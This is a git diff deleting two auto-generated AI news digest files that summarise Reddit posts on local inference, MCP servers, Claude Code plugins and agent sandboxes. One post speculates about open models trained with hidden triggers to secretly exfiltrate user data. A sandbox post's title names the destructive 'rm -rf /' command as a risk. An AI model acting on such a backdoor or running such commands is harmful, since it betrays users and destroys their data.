### gfx1100 (Radeon RX 7900 XTX / Radeon Pro W7900) The initial implementation has Qwen 3.6 (MoE and dense) running competitively with llama.cpp, with the [ParoQuant](https://github.com/shisa-ai/paroquant) (which I've also ported to be ROCm compatible) 4.68bpw having better c=1 prefill ("prompt processing") at every tested context length, from 512-128K on gfx1100 (W7900/7900 XTX): ### Prefill tok/s | Workload | hipEngine PARO | hipEngine GGUF Q4_K_S | llama.cpp HIP | llama.cpp Vulkan | | --- | ---: | ---: | ---: | ---: | | 512/128 | **2718.497** | 2258.847 | 2436.04… - ---- - -## [MergeNB: An intuitive merge conflict resolver built for Jupyter notebooks in VS Code [P]](https://reddit.com/r/MachineLearning/comments/1tmq1eb/mergenb_an_intuitive_merge_conflict_resolver/) -*Reddit r/MachineLearning* | 24/05/2026 | Score: 1.00 -Tags: developer_tool - -> I used to work heavily with Jupyter Notebooks + git + VS Code in a collaborative research setting and found nbdime to be somewhat buggy/a hassle to work with in general. So, in typical side project fashion ([relevant xkcd](https://xkcd.com/1319/)) I've been working on MergeNB quite a bit over the last 6 months or so. It's (currently only) a VS Code extension with a web UI, and has a few cool improvements over other alternatives, which I outlined in the README/docs site. I'd be over the moon if this actually gets used by people, and would love a star if it's interesting. See [https://github.com/Avni2000/MergeNB](http://github.com/Avni2000/MergeNB). 
I've also been working on a static documentation site here: [https://avni2000.github.io/MergeNB/docs](https://avni2000.github.io/MergeNB/docs) I'm planning on working on it a lot more over the summer and properly fleshing out a few of the ideas I had (including making it a git mergetool as well as a VS Code extension), so if you'd like to contribute, feel free to raise an issue or shoot me a message/email :) - ---- - diff --git a/data/digest-2026-05-25.md b/data/digest-2026-05-25.md deleted file mode 100644 index 2052675..0000000 --- a/data/digest-2026-05-25.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-25** | 15 stories | Auto-generated from 588 archived stories - ---- - -## [I made a local-first MCP tutorial repo with node-llama-cpp and a custom agent loop](https://reddit.com/r/LocalLLaMA/comments/1tn1jjy/i_made_a_localfirst_mcp_tutorial_repo_with/) -*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 -Tags: api_update, mcp, developer_tool, cli_tool, tool_update - -> I just published a repo called MCP from Scratch that teaches the Model Context Protocol by building it step by step in plain Node.js. Most of the repo is about understanding MCP itself, but the later modules may be relevant here: I added a local-first setup using `node-llama-cpp`, GGUF models, MCP sampling, and a custom plan -> act -> observe agent loop. So the repo goes from: * raw JSON-RPC and stdio transport * to a working MCP server with tools/resources/prompts * to local model integration * to an agent loop that uses MCP tools with a local GGUF model There’s also an optional LangChain example, but the main path is intentionally minimal and tries to make the underlying mechanics obvious. 
Key points: * plain Node.js, minimal abstractions * designed as a learning repo, not a production SDK * uses shared local GGUF models for the later modules * built for people who want to understand what MCP tooling is actually doing under the hood Repo: [https://github.com/pguso/mcp-from-scratch](https://github.com/pguso/mcp-from-scratch) Would especially love feedback from people here on the local inference side: * model choice * whether the agent loop examples feel useful or too toy-ish - ---- - -## [I stress-tested Kimi K2.6 against Claude Opus 4.7 on a quick coding-agent task](https://reddit.com/r/ClaudeAI/comments/1tn9fpq/i_stresstested_kimi_k26_against_claude_opus_47_on/) -*Reddit r/ClaudeAI* | 25/05/2026 | Score: 1.00 -Tags: api_update, open_source, tool_update, agent_tool - -> I tested Claude Opus 4.7 and Kimi K2.6 on the same coding agent task i.e. build an AI Fix Runner that takes a broken repo, runs its tests, identifies the failure, applies a patch, reruns the test, and exposes the final diff/logs through an API and UI. The goal was not to benchmark syntax completion or simple repo edits. I wanted to test model behavior on a less familiar integration path: shifting execution from local processes into remote sandboxes. I used Tensorlake specifically because the sandbox API is newer and integration-heavy. This made the test more about whether the model could reason through unfamiliar infra and produce a working implementation. Setup: * Claude Opus 4.7 through Claude Code * Kimi K2.6 through OpenCode via OpenRouter Pricing context: * Claude Opus 4.7: $5/M input, $25/M output * Kimi K2.6: $0.95/M input ($0.16 cached input), $4/M output So, what made it interesting is if Kimi's lower cost can handle a crazy workflow. To be clear, comparing Kimi K2.6 directly with Opus 4.7 is not completely fair. The model classes, pricing, and expected capability levels are very different. 
I mainly wanted to see how far an open model could get on the same task at a fract… - ---- - -## [Workbench Launches Open Source BullMQ Dashboard For Node Backends](https://x.com/pontusab/status/2058588422001029549) -*Aligned News (Scoble)* | 25/05/2026 | Score: 1.00 -Tags: product_launch, open_source, tool_update - -> Workbench launched as an open-source BullMQ dashboard with flows, metrics, schedulers, and search for Node backends. - ---- - -## [Ditched GitHub Copilot yearly subscription. What's the best way to run Claude nowadays?](https://reddit.com/r/ClaudeAI/comments/1tnl23a/ditched_github_copilot_yearly_subscription_whats/) -*Reddit r/ClaudeAI* | 25/05/2026 | Score: 0.94 -Tags: api_update, developer_tool, cli_tool - -> Hey everyone, I recently cancelled my yearly GitHub Copilot subscription. My old workflow was simple: I used the GitHub Copilot extension in VS Code, but I swapped the backend model to Sonnet / Opus and relied heavily on the `/plan` command to code. I absolutely loved it and I would like that exact flow back. My plan was to just go full Bring Your Own Key (BYOK) inside VS Code using an API key and pay per token for Sonnet or Opus. However, I’m seeing all this hype around CLI tools, and it has me second-guessing my setup. I’m completely open to trying new workflows if they are a massive upgrade, but honestly, I’d be much happier just staying in my cozy VS Code environment if the math makes sense. so my questions are: 1. Is a flat Claude subscription actually cheaper than an API key for heavy coding? In my old copilot plan I believe just once I used all my tokens per month. 2. How bad is the token bleed if I stick to BYOK? I heard with CLI you make some markdown files and things get cheaper / faster. Can you do that with BYOK as well? thanks for any advice! 
- ---- - -## [I built a meme-y social feed for programmers that lives inside Claude Code (and Cursor, and Copilot CLI)](https://reddit.com/r/ClaudeAI/comments/1tnlji5/i_built_a_memey_social_feed_for_programmers_that/) -*Reddit r/ClaudeAI* | 25/05/2026 | Score: 1.00 -Tags: developer_tool, cli_tool - -> I spend hours every day in Claude Code, but I started feeling weirdly isolated. So I built a tiny social network that lives inside it. WAYD ("What Are You Doing?") is a Claude Code skill. You type `/wayd` and either post a short "vibe" about your coding day or scroll a random feed of what other developers are losing their minds over. React with emojis, drop a one-line reply, get back to work. The whole thing runs on GitHub Issues as the silent backend. No server, no database, no signup, just your existing `gh` CLI. You never see issues, JSON, or `gh` commands; the skill orchestrates everything in the background. It feels like a tiny social app inside the terminal. 8 vibe-tags to pick from when you post: 🤡 cursed-code, 🪦 rip-me, 🫠 brain-melt, 🧙 dark-arts, 🔥 hot-take, 💭 shower-thought, 🤔 existential, ☕ procrastinating. Each is a mood, not a topic. Write up to 1000 chars, publish under your real GitHub handle, scroll a random feed of strangers doing the same. **Install on Claude Code**: claude plugin marketplace add ferdinandobons/wayd claude plugin install wayd@wayd Other install methods + screenshots: [https://github.com/ferdinandobons/wayd](https://github.com/ferdinandobons… - ---- - -## [Is AI inference platform really that saturated now? [D]](https://reddit.com/r/MachineLearning/comments/1tngk7p/is_ai_inference_platform_really_that_saturated/) -*Reddit r/MachineLearning* | 25/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> I’m thinking of expanding an on-device inference SDk into a full blown AI inference platform and seeing more and more inference platform popping out. Been talking with a VC from Seattle/NY. Is this space really that saturated? 
- ---- - -## [Reconstructing the agent methodology: Decoupling decision-making and execution - open source [P]](https://reddit.com/r/MachineLearning/comments/1tnfxsc/reconstructing_the_agent_methodology_decoupling/) -*Reddit r/MachineLearning* | 25/05/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> I’ve been thinking about a problem in current agent systems: Most agents are becoming very good at execution, but the decision layer before execution is still unclear. Coding agents, research agents, tool loops, sandboxes, workflows, and harnesses are all improving quickly. Once a human gives an intent, agents can often do a lot of useful work. But the higher-level question is still usually left to the user: What should happen next, and why? I’ve been exploring this idea through an open-source project called Spice. The simplest way to describe it is: Spice is a decision layer above agents. It is not trying to replace execution agents. Tools like Claude Code, Codex, Hermes, or other agents can still do the actual work. Instead, Spice sits before execution and tries to make the decision process explicit: - what was observed - what options were considered - why one option was selected - what trade-offs were rejected - whether execution needs approval - what happened afterward - how that outcome should affect the next decision The current runtime is still early, but it can already be installed, configured with an LLM provider, run in the terminal, inspect Decision Cards, and hand off… - ---- - -## [I’m building an open-source decision layer above AI agents [P]](https://reddit.com/r/MachineLearning/comments/1tndi8y/im_building_an_opensource_decision_layer_above_ai/) -*Reddit r/MachineLearning* | 25/05/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> Hi everyone, I’m Jia, the creator of Spice. I’ve been working on an open-source project called Spice. The simplest way to describe it is: Spice is a decision layer above agents. 
Most agent systems today are very focused on execution, They are getting better at doing tasks after a human gives them an intent. But the higher-level question is still usually left to the user: What should happen next, and why? That is the layer I want Spice to explore. Spice is not trying to replace execution agents. Tools like Claude Code, Codex, Hermes, or other agents can still do the actual work. Instead, Spice sits before execution and tries to make the decision process explicit: - what was observed - what options were considered - why one option was selected - what trade-offs were rejected - what happened afterward - how that outcome should affect the next decision The current runtime is still early, but you can already install it, set up an LLM provider, run it in the terminal, inspect Decision Cards, and hand off approved execution to external agents. My goal is to make agent behavior less of a black box. Instead of only seeing the final result of an agent task, I want to preserve the reasoning… - ---- - -## [I built a computer use sandbox framework for codex on headless linux. GPU passthrough, computer use, and sudo access for codex all work. It's the perfect dev sandbox to allow full auto work while minimizing the "rm -rf /" risk](https://reddit.com/r/LocalLLaMA/comments/1tn3i55/i_built_a_computer_use_sandbox_framework_for/) -*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 -Tags: developer_tool, agent_tool - -> I've been working with agents for months now, and I haven't found a sandbox environment that "just works" so I built it! My requirements were as follows: 1. Agent is unable to destroy my host OS but able to install software and run sudo commands 2. Agent is able to browse the web autonomously and validate the UI it creates 3. GPU access works (even on DGX spark which cant pass through to 4. Docker works 5. 
Persistent environment I can setup once, log into my internet accounts I want the agent to access, copy in my .env files, install custom software etc. 6. Support multiple parallel browser use / development sessions concurrently 7. Easily log into each agent's desktop to view the work it's doing or manually setup the agent environment via a desktop interface The inspiration for this project is wanting a sandbox I can let the agent run free in, while limiting the damage it can do. I want it to be able to browse the web, do automated AI research on my GPU, test my docker containers in a sandbox, develop my webapp full-auto, or whatever other task I need it to do while still being safely in a sandbox and unable to wipe or modify my host system. I felt like either I had to go full YO… - ---- - -## [We added W8A8 activation quantization to MLX — prefill went from 2.84s to 2.52s on M5 Pro](https://reddit.com/r/LocalLLaMA/comments/1tn2p61/we_added_w8a8_activation_quantization_to_mlx/) -*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Hey, I work on inference tooling at Mininglamp AI. We needed faster prefill for a 4B VLM running on Apple Silicon. Problem was MLX only does weight-only quant — activations stay FP16 the whole way through. So we wrote Cider, a small SDK that adds W8A8 activation quant on top of MLX. Numbers on M5 Pro (64GB, 307 GB/s), 4516 token context: |Quantization|Prefill|Decode| |:-|:-|:-| |W8A16 (MLX)|2.839s|80.1 tok/s| |W8A8 (Cider)|2.519s|79.5 tok/s| Under the hood it's custom Metal kernels we registered as MLX primitives. At M=4096 the per-channel path runs 1.84x faster than W8A16 on the same shape. Not just for our model btw — works with anything that runs through MLX. One catch: INT8 TensorOps only compile on M5 and above. pip install on M4 still works, just falls back to the regular path. 
Repo: [https://github.com/Mininglamp-AI/cider](https://github.com/Mininglamp-AI/cider) Edit: adding accuracy numbers since it came up. Wikitext2 PPL on Qwen3-8B: FP16 9.73, W8A16 9.71, W8A8 per-channel 9.76. Llama3-8B: FP16 6.14, W8A16 6.15, W8A8 per-channel 6.27. Per-group gs=64 keeps it tighter if precision matters more than speed for your use case. - ---- - -## [xAI releases Grok Build 0.1.219, fixing kitty terminal layout issues and paste-related data loss](https://www.digg.com/ai/hlcz47lw) -*Digg AI* | Score: 1.00 -Tags: product_launch, cli_tool - ---- - -## [Wrote a custom C++ engine for MiniCPM-V 4.6 on Orange Pi AIPro (Ascend 310B) to bypass framework overhead](https://reddit.com/r/LocalLLaMA/comments/1tmy4g9/wrote_a_custom_c_engine_for_minicpmv_46_on_orange/) -*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> Hey everyone, just wanted to share a project I've been hacking on for the last few weeks. I managed to build a from-scratch C++ inference engine to run MiniCPM-V 4.6 entirely on the Orange Pi AIPro (the budget board with the Ascend 310B NPU, costs around $149 for 20 TOPS INT8 / 10 TFLOPS FP16). If you want to check out the custom ops, build scripts, or the Gradio web UI, the repository is open source on GitHub at [github.com/lvyufeng/minicpm-v-4.6-orangepi](http://github.com/lvyufeng/minicpm-v-4.6-orangepi) https://preview.redd.it/upfsqb0jm73h1.png?width=1655&format=png&auto=webp&s=1e80185171fa6db651d81e20d717b3a05791614c If you've ever tried deploying local LLMs or VLMs on this specific hardware, you probably know that dealing with the standard framework stack can be a massive pain, especially if you want to get any decent performance on the edge. To get around this, I skipped the heavy frameworks and went low-level. Both the text generation and the SigLIP vision tower run natively on the NPU inside a single C++ subprocess. There is absolutely zero torch\_npu dependency on the hot path. 
Python is only used on the cold path for CPU-side tokenization and image preproces… - ---- - -## [I shipped a windows desktop app for running local LLMs with a button that turns your "no thats wrong" into actual LoRA training data](https://reddit.com/r/LocalLLaMA/comments/1tmxp03/i_shipped_a_windows_desktop_app_for_running_local/) -*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 -Tags: api_update, cli_tool - -> i built a local AI desktop app and just shipped it. windows only. called SEELS. dropping it here cause if anyones gonna find the cracks its you guys. the thing i actually wanted to make wasnt another ollama wrapper. what bugged me is every local model id run would say something dumb and id sit there going "no thats not what i meant". then id close the chat and the model never knew, never learned. so the whole hook of SEELS is theres a Teach button on every reply where you write what it should have said. those corrections pile up into a jsonl corpus, and when you have enough you click Train and it actually kicks off a PEFT LoRA run on your base. no notebook, no python, no terminal. just chat, correct, train. over time the adapters stack up and it becomes your model not theirs. trained a tiny 0.6B helper from scratch on like 110 hand written examples so theres something that runs on CPU out of the box. not replacing your daily 35B obviously but it answers questions about how to use SEELS itself which was the point. rest of standard (free, forever, not a trial): bring any GGUF, voice mode with whisper STT and piper TTS both local no API keys, hardware dashboard so you can stop guessi… - ---- - -## [Could Open Models be trained to secretly go rogue?](https://reddit.com/r/LocalLLaMA/comments/1tmpqrv/could_open_models_be_trained_to_secretly_go_rogue/) -*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> I was discussing with some other folks how safe is to use open weights models from China and the topic of "trojan horse" came up. 
We know that, at least with current architecture, models can't run code on their own. They are entirely dependent on tools and harnesses. We also know that a local run model can't have any kind of remote "switch" that would change its behavior or inject a different prompt. But would there be any other ways to "execute order 66" 😄 ? Could a lab, for instance, train a model that would change its behavior upon reading certain trigger phrases or perhaps at a specific date? They would then secretly gather sensitive info and send it somewhere else without user consent. Obviously the model would have to be running in an harness capable of such tool-use (which is quite common with openclaws, hermes, etc). Thoughts? - ---- - -## [I made a Chrome extension that lets me use ChatGPT from any webpage without an API key, so its compeletly free.](https://reddit.com/r/ChatGPT/comments/1tmznuc/i_made_a_chrome_extension_that_lets_me_use/) -*Reddit r/ChatGPT* | 25/05/2026 | Score: 0.94 -Tags: api_update, developer_tool - -> I’ve been building a Chrome extension called **Dichrome**. The basic idea is simple: it lets you use ChatGPT from a sidebar while you’re on any webpage, without needing an API key or paying for a separate AI sidebar subscription. For example, in the screenshots I was on my GitHub repo page. I clicked the screenshot button in the Dichrome sidebar, typed “Can you see the attached image?”, and hit send. Dichrome then sent the prompt and screenshot to ChatGPT through the normal ChatGPT UI. I didn’t have to open ChatGPT myself, switch tabs, upload the image manually, or copy anything over. The response came back inside the sidebar, and the actual ChatGPT conversation was also saved inside my **Dichrome project folder**. That part matters to me because I don’t want random sidebar chats cluttering my normal ChatGPT history. Anything started from the extension gets routed into its own project folder instead. The workflow is basically: 1. 
Stay on whatever webpage you’re using 2. Click screenshot or send selected text 3. Type your prompt in the sidebar 4. Dichrome sends it to ChatGPT through the normal UI 5. The answer shows up back in the sidebar 6. The chat gets saved in the Dichrome proj… - ---- - diff --git a/data/digest-2026-05-26.md b/data/digest-2026-05-26.md deleted file mode 100644 index 4983559..0000000 --- a/data/digest-2026-05-26.md +++ /dev/null @@ -1,121 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-26** | 15 stories | Auto-generated from 541 archived stories - ---- - -## [open-source plug-in for claude code: declare what it can't do in yaml, enforced at the tool boundary](https://reddit.com/r/ClaudeAI/comments/1tofpzr/opensource_plugin_for_claude_code_declare_what_it/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 -Tags: api_update, mcp, open_source, developer_tool - -> last week claude code force-pushed on me. nothing in the prompt said it could, it just inferred "make sure the branch is clean" loosely. wanted a hard rule i could plug in so this couldn't happen again. so i built sponsio, an open-source plug-in for claude code that gates tool calls at the boundary. apache 2.0. hooks in via the claude agent sdk (or the mcp layer if your tools go through there). write contracts in yaml using assume-guarantee structure ("if the agent calls X, the trace must satisfy Y"). when claude code tries to call a tool, sponsio checks first. allow, block, or escalate to human. guarantee clauses are temporal logic over the action trace, so you can also express "tests must pass before commit", "no two writes to the same file in a session", or "max N file edits per session", not just deny-lists. why deterministic: prompts give statistical behavior, not guarantees. once context fills, even obvious rules drift. hard guarantees have to live outside the probabilistic part of the system. 
how claude code helped build it: i sketched the LTL evaluator AST, claude filled in each operator's trace-evaluation case. framework adapters are mostly claude generations from interfa… - ---- - -## [Built an MCP server so Claude can generate music, images, and video natively. One config block.](https://reddit.com/r/ClaudeAI/comments/1toh1pr/built_an_mcp_server_so_claude_can_generate_music/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 -Tags: api_update, mcp, cli_tool - -> I've been using Claude Code daily for the last few months and kept hitting the same wall: I'd ask Claude to produce a creative artifact (a song, a cover, a short video) and end up writing the API glue myself, then pasting results back into the chat. Felt backwards. So I built an MCP server around my AI generation platform. It exposes three tools to Claude: \- aw\_generate\_music (Suno, full songs with lyrics or instrumental) \- aw\_generate\_image (Z-Image Turbo, Wan 2.5 Spicy, Grok Imagine Quality, GPT-Image-2, Nano Banana 2, and others) \- aw\_generate\_video (Kling 3.0 Standard/Pro/4K T2V + I2V, Wan 2.2, Hailuo 02, Seedance, Grok video) One key. One credit pool. The agent picks the right model for the prompt. Install: npm install -g u/aetherwave-studio/mcp Claude Code config (\~/.config/claude/mcp.json or wherever yours lives): { "mcpServers": { "aetherwave": { "command": "npx", "args": \["-y", "@aetherwave-studio/mcp"\], "env": { "AW\_API\_KEY": "aw\_live\_YOUR\_KEY\_HERE" } } } } Restart Claude. Done. Prompts that work end-to-end without any additional setup: 1. 
"Generate a 60-second lo-fi track for a study playlist, then make me 3 album cover options in a retro Japanese prin… - ---- - -## [Small set of local MCP server installers for home Linux users](https://reddit.com/r/LocalLLaMA/comments/1to8y2i/small_set_of_local_mcp_server_installers_for_home/) -*Reddit r/LocalLLaMA* | 26/05/2026 | Score: 1.00 -Tags: api_update, mcp, open_source - -> Hi all, I have published a small open-source MCP server bundle called **MCP Basic Servers**: [https://github.com/mchowy-troll/mcp-basic-servers](https://github.com/mchowy-troll/mcp-basic-servers) It is a collection of simple Bash installer scripts for running local **MCP HTTP servers on Linux**. **The idea is simple: run one script, answer a few questions, get a working local MCP endpoint at \`/mcp\`.** This project is mainly for **beginner and intermediate Linux users** who want to experiment with MCP tools at home without manually setting up Python environments, systemd services, SQLite databases, or local web search from scratch. It is not meant to be an enterprise-grade or hardened production platform. It is intentionally simple, readable, and designed for local/home use. 
The first release includes six servers: * **web** — live web search and webpage fetching through local SearXNG * **files** — local workspace tools for text, CSV, Markdown and PDF * **memory** — local SQLite-based memory * **contacts** — local SQLite-based contacts * **wiki\_verifier** — Wikidata and Wikipedia context/verification tools * **weather** — weather tools using Open-Meteo Default ports are \`8001-80… - ---- - -## [Harbor v0.4.19 - vllm/sglang/llama.cpp launch codex/claude/pi/opencode](https://reddit.com/r/LocalLLaMA/comments/1to8t53/harbor_v0419_vllmsglangllamacpp_launch/) -*Reddit r/LocalLLaMA* | 26/05/2026 | Score: 1.00 -Tags: product_launch, cli_tool, agent_tool - -> I'm usually not posting about Harbor releases out of the respect for the community here, but I think v0.4.19 might save a lot of people some time. Harbor can now launch your local agentic coding tools with local inference backends. For example, to run pi + vllm: # model downloaded and configured harbor up vllm # Harbor knows that vllm is running and will use it harbor launch pi Additionally, `launch` can proxy requests through built-in optimising LLM gateway which automatically injects and resolves tools, such as web search, so you can add web search to an agent by just appending `--web` to the command and Harbor will pre-wire everything: harbor launch --web --model qwen3.5:4b --backend ik_llamacpp mi -p 'Find recent releases of agentic tools and write a two sentence overview' You can find many more details in the wiki here: [https://github.com/av/harbor/wiki/3.-Harbor-CLI-Reference#harbor-launch-launch-options---service-servicetool-args](https://github.com/av/harbor/wiki/3.-Harbor-CLI-Reference#harbor-launch-launch-options---service-servicetool-args) Thank you! 
- ---- - -## [This is insane.](https://reddit.com/r/ClaudeAI/comments/1to6zg8/this_is_insane/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 -Tags: api_update, mcp, open_source - -> Just installed an open source tool that wiped most of the tool-definition tokens out of my Claude Code context before any prompt. Same MCP servers. Same tools available. 8 servers, 142 tools across them. Before: the tool definitions ate 38k tokens of context every single turn. Cold start, my context bar was already orange and I hadn't typed anything. After: 4k. The Claude Code session sees three tools (`search_tools`, `invoke_tool`, `auth`) and dispatches everything else under the hood. When I ask for a thing, it ranks the catalog with BM25 in microseconds and surfaces the top 5. The part nobody's talking about: there's no LLM in the ranking loop. No embedding API to pay. No vector DB to host. It's keyword search over a flat projection of tool name + description, deterministic, offline. Apparently this was always going to be enough. It's [Ratel](https://github.com/ratel-ai/ratel). Open source. The install is `ratel mcp import` and it migrates your existing Claude Code MCP config in one command, with backups written automatically. Took me 90 seconds. Why is every "context layer" startup pitching me semantic embeddings and inference-time re-ranking when basic BM25 over tool definiti… - ---- - -## [Find where claude code burns your tokens](https://reddit.com/r/ClaudeAI/comments/1toagk7/find_where_claude_code_burns_your_tokens/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 0.86 -Tags: api_update, developer_tool, cli_tool - -> I started using claude code as a harness for a side project a few months ago, and the native OTLP exporter gives you metrics and event logs but not the full execution path you need to actually debug. Also, I needed to keep token usage under control too. So I built a package that installs a Stop hook in ~/.claude/settings.json. 
Claude Code runs this hook automatically every time a turn ends. The hook reads the new portion of the transcript, reconstructs the turn as opentelemetry spans, and posts them to latitude's OTLP endpoint. Install: npx -y @latitude-data/claude-code-telemetry install Works in CLI, desktop app, and IDE extensions. Disclosure: I work at Latitude. I did this for personal needs but now it’s integrated on the product. It's free, MIT-licensed, source is on GitHub. Happy to answer technical doubts - ---- - -## [Anyone else dread keeping web, Android, and iOS releases in sync?](https://reddit.com/r/ClaudeAI/comments/1tnr1vf/anyone_else_dread_keeping_web_android_and_ios/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 0.86 -Tags: product_launch, cli_tool, tool_update - -> I got tired of every “small update” turning into version bumps, patch notes, store metadata, web deploys, Android uploads, TestFlight builds, and one more iOS step I couldn’t even run locally because I don’t own a Mac. I have a game built with React + Vite + Matter.js + Capacitor. It’s live on web, Android, and iOS. I was getting worn down by the release chores: version bumps, build numbers, localized patch notes, store metadata, Capacitor syncs, signing, uploads, all the little steps that are easy to mess up and also ridiculously time consuming. Also, I don’t own a Mac, so I thought iOS was out of the question... until.... 
I wired the repo so Claude can take a normal request like: “ship the updates since our last version bump, browser, Android, and iOS TestFlight with release notes” then the Claude code gets to work with a repeatable path: \- bump the right versions/build numbers both in build and in game ui \- create patch notes for every supported language \- run lint/typecheck/build through \`npm run verify\` \- sync Capacitor after the web build \- build and upload iOS to TestFlight from GitHub Actions on a macOS runner \- build an Android AAB and upload it to Google Play \-… - ---- - -## [Claude makes documents into apps](https://reddit.com/r/ClaudeAI/comments/1toajqg/claude_makes_documents_into_apps/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 0.70 -Tags: open_source, tool_update, agent_tool - -> # Any document can become an app I’ve been working on an open-source document format and viewer called **Adaptive Markdown**. The basic idea is simple: A document should not have to stay static. It should be something a coding agent can extend, reshape, and turn into an interactive workspace. This is not just a canvas you edit with a chatbot. The bigger idea is that the document becomes both: 1. the source of truth 2. the programmable interface In other words, the document becomes a living app. You write notes, collect data, draft text, or import files. Then a coding agent can directly modify the document surface: add charts, create calculators, build filters, restyle sections, generate summaries, export views, or turn rough notes into an interactive tool. So instead of having: * a document * a spreadsheet * a dashboard * an app * a changelog * a separate AI chat about all of it You can have one living `.md` file that contains those layers together. # Example A fitness log might start as a plain Markdown journal. Then the agent adds charts. Then it pulls in device data. Then it adds weekly summaries, rolling averages, goal tracking, export options, and a dashboard view. 
The docume… - ---- - -## [Merge API launches Merge Gateway to help enterprises build custom model routers based on product-specific benchmarksIt prevents enterprise cost overruns from overusing frontier models](https://www.digg.com/ai/5nn022fp?rank=3) -*Digg AI* | Score: 1.00 -Tags: api_update, product_launch - ---- - -## [Merge API launches Merge Gateway to help enterprises build custom model routers based on product-specific benchmarks](https://www.digg.com/ai/5nn022fp) -*Digg AI* | Score: 1.00 -Tags: api_update, product_launch - ---- - -## [i benchmarked Anthropic's tool-search-tool head to head against our own MCP gateway on Opus 4.7. ours held up noticeably better](https://reddit.com/r/ClaudeAI/comments/1to7byy/i_benchmarked_anthropics_toolsearchtool_head_to/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> i'd been running Claude Code with a long list of MCP servers connected. Linear, Notion, GitHub, Slack, a few internal ones. and i was pretty confident that Opus 4.7 plus Claude Code's built in tool-search-tool would just absorb all of it. it mostly did. but i was still hitting \~20% context saturation way too often, before doing any actual work. tried Ratel (our own MCP gateway, we built it for exactly this problem) kind of out of curiosity. then we benchmarked it properly, head to head against Anthropic's own tool-search-tool, same model (Opus 4.7), realistic tool catalogs at 50 / 100 / 180 tools. at the 180 tool pool, measured against the full-catalog baseline: * Ratel: near parity on accuracy (about -1.7pp) and roughly -81% input tokens. * Anthropic's tool-search-tool: about -8.4pp accuracy. so somewhere around 5x the accuracy hit, same model, same catalog. the takeaway for me: a big context window and a built in tool search are not the same thing as a gateway thats actually optimised for the one job of deciding what enters context. 
repo plus the full benchmark, numbers and methodology, is here: [github.com/ratel-ai/ratel](http://github.com/ratel-ai/ratel) happy to be wrong on… - ---- - -## [I didn't want blind multi-agent orchestration or API rates, so I built atrium to keep me in the loop with my CLI agents.](https://reddit.com/r/ClaudeAI/comments/1to69z3/i_didnt_want_blind_multiagent_orchestration_or/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 -Tags: api_update, cli_tool - -> I'd been running multi-agent workflows for a while. Whether it was across multiple projects or on the same project. Brainstorming sessions, planning sessions, builds happening in worktrees, asking for Claude's opinion on new tires for my car cause it was closer to hand than Google. This felt really clunky in most of the tools I was using and when I started looking for alternatives, everything felt like it was trying to remove me from the equation and just run agents in the background. So, I built atrium. A macOS human-in-the-loop multi-agent workspace. The entire project was built with [the BMad Method](https://github.com/bmad-code-org/BMAD-METHOD?tab=readme-ov-file) and Claude Code (mostly Opus). It's over 60 BMad written epics in now and counting. atrium makes CLI agents first-class citizens within a versatile, tiling workspace. It wires up agents via hooks to the app to surface interactive activity cards, saves state comprehensively so everything resumes, provides a robust CLI that allows agents to completely drive the app, and gives me every tool I need to get the job done. 
Happy to answer any questions about it and would love to hear how y'all are handling multi-agent workflo… - ---- - -## [Just passed the new Claude Certified Architect - Foundations (CCA-F) exam with a 985/1000!](https://reddit.com/r/ClaudeAI/comments/1to0xfc/just_passed_the_new_claude_certified_architect/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 -Tags: api_update, tool_update - -> The original post was removed by Reddit Filters, so I made new one with same content. I just got my results back today and managed to snag the Early Adopter badge as well. Following up on my recent DP-600 certification, I really wanted to validate my architecture skills specifically on the Anthropic side. The exam covers a lot of practical ground on prompt engineering for tool use, managing context windows efficiently, and handling Human-in-the-Loop workflows. Link to join: https://anthropic.skilljar.com/claude-certified-architect-foundations-access-request Training courses: https://anthropic.skilljar.com/ Cookbook: https://github.com/anthropics/anthropic-cookbook I've created my own Playbook and Mock Exam after the exam: https://drive.google.com/file/d/1luC0rnrET4tDYtS7xe5jUxMDZA-4qNf-/view?usp=sharing https://claude-certified-architect-mock-exam-cyberskill.vercel.app If anyone is preparing for this right now and has questions about the format or the types of architectural patterns tested, ask away! Happy to share some insights on what to study. Updated 26th May 2026: I noticed some mates treated me bananas (https://buymeacoffee.com/zintaen), didn't expect that, but you made my d… - ---- - -## [Finally tested an AI video tool that works directly in Claude without setup](https://reddit.com/r/ClaudeAI/comments/1tnx7ka/finally_tested_an_ai_video_tool_that_works/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> Been using Claude for everything creative lately and got tired of switching to Runway every time I needed video. 
